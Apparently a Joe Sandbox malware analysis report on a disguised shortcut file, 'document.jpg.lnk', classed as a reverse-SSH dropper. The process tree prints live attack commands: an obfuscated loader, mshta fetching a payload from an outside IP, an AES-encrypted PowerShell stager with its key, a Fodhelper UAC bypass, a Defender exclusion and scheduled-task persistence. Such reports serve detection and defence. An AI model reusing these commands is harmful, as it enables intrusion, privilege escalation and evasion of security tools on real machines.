Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
document.jpg.lnk

Overview

General Information

Sample name:document.jpg.lnk
Analysis ID:1391084
MD5:aa17c1186359a1ff75f4c53531de4b40
SHA1:726d59562bf9c5530706337181c995aa7aa7df56
SHA256:043ecf851126758e1c385c7996da325b7c10d45a4c0d56a165a91adc50a8b952
Tags:lnk
Infos:

Detection

Reverse SSH
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Outlook Reverse SSH
Adds a directory exclusion to Windows Defender
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Bypass UAC via Fodhelper.exe
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious MSHTA Child Process
Suspicious execution chain found
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 4416 cmdline: "C:\Windows\System32\WScript.exe" "C:\Windows\System32\SyncAppvPublishingServer.vbs" ;565,571,560,572,553,488,560,572,572,568,514,503,503,513,505,502,513,506,502,506,508,512,502,507,510,503,524,567,575,566,564,567,553,556,571,503,555,567,566,558,561,559,502,557,576,557|%{$n+=[char]($_-456)};$n | powershell - MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer ;565,571,560,572,553,488,560,572,572,568,514,503,503,513,505,502,513,506,502,506,508,512,502,507,510,503,524,567,575,566,564,567,553,556,571,503,555,567,566,558,561,559,502,557,576,557|%{$n+=[char]($_-456)};$n | powershell -} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7252 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 7332 cmdline: "C:\Windows\system32\mshta.exe" http://91.92.248.36/Downloads/config.exe MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 7480 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $wauLzkw = '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';$OgScJgJi = 'SkpHRVl2TnV5dFNtYW5DdHVYbGRPQk5QandWRlpOU0o=';$BwerIjm = New-Object 'System.Security.Cryptography.AesManaged';$BwerIjm.Mode = [System.Security.Cryptography.CipherMode]::ECB;$BwerIjm.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$BwerIjm.BlockSize = 128;$BwerIjm.KeySize = 256;$BwerIjm.Key = [System.Convert]::FromBase64String($OgScJgJi);$FfImT = [System.Convert]::FromBase64String($wauLzkw);$dpHrhAbw = $FfImT[0..15];$BwerIjm.IV = $dpHrhAbw;$VveFZCBje = $BwerIjm.CreateDecryptor();$qFKMUzafD = $VveFZCBje.TransformFinalBlock($FfImT, 16, $FfImT.Length - 16);$BwerIjm.Dispose();$FDICvmkx = New-Object System.IO.MemoryStream( , $qFKMUzafD );$hebjfzMz = New-Object System.IO.MemoryStream;$bIJBQdkJw = New-Object System.IO.Compression.GzipStream $FDICvmkx, ([IO.Compression.CompressionMode]::Decompress);$bIJBQdkJw.CopyTo( $hebjfzMz );$bIJBQdkJw.Close();$FDICvmkx.Close();[byte[]] $BDYZJphM = $hebjfzMz.ToArray();$eYTnUe = [System.Text.Encoding]::UTF8.GetString($BDYZJphM);$eYTnUe | powershell - MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" - MD5: 04029E121A0CFA5991749937DD22A1D9)
              • cmd.exe (PID: 7684 cmdline: C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • reg.exe (PID: 7700 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
                • reg.exe (PID: 7716 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
                • fodhelper.exe (PID: 7732 cmdline: FoDHelper.exe MD5: 85018BE1FD913656BC9FF541F017EACD)
                  • cmd.exe (PID: 7776 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • cmd.exe (PID: 7824 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • powershell.exe (PID: 7868 cmdline: powershell -w 1 -ep Unrestricted -nop Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming; MD5: 04029E121A0CFA5991749937DD22A1D9)
                        • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                        • WmiPrvSE.exe (PID: 8116 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
              • cmd.exe (PID: 8044 cmdline: C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • reg.exe (PID: 8060 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
                • reg.exe (PID: 8080 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • cmd.exe (PID: 7816 cmdline: C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • reg.exe (PID: 7856 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
                • reg.exe (PID: 7832 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
                • fodhelper.exe (PID: 7948 cmdline: FoDHelper.exe MD5: 85018BE1FD913656BC9FF541F017EACD)
                  • cmd.exe (PID: 2072 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • cmd.exe (PID: 7880 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 7884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • powershell.exe (PID: 4676 cmdline: powershell.exe -w 1 -ep Unrestricted -nop schtasks.exe /TN MicrosoftEdgeUpdateTaskMachine /CREATE /F /TR C:\Users\user\AppData\Roaming\tiago.exe /SC ONLOGON MD5: 04029E121A0CFA5991749937DD22A1D9)
                        • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                        • schtasks.exe (PID: 3292 cmdline: "C:\Windows\system32\schtasks.exe" /TN MicrosoftEdgeUpdateTaskMachine /CREATE /F /TR C:\Users\user\AppData\Roaming\tiago.exe /SC ONLOGON MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • cmd.exe (PID: 7064 cmdline: C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • reg.exe (PID: 7948 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
                • reg.exe (PID: 5832 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • cmd.exe (PID: 5228 cmdline: C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • reg.exe (PID: 1164 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user\AppData\Local\Temp\r.bat" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
                • reg.exe (PID: 6548 cmdline: REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
                • fodhelper.exe (PID: 2920 cmdline: FoDHelper.exe MD5: 85018BE1FD913656BC9FF541F017EACD)
                  • cmd.exe (PID: 8056 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\r.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • cmd.exe (PID: 5308 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\r.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 3500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • tiago.exe (PID: 3944 cmdline: C:\Users\user\AppData\Roaming\tiago.exe MD5: 41B99B0770F01AFBD80481FB6F811BCC)
                        • conhost.exe (PID: 1960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 7920 cmdline: C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • reg.exe (PID: 7896 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
                • reg.exe (PID: 6800 cmdline: REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)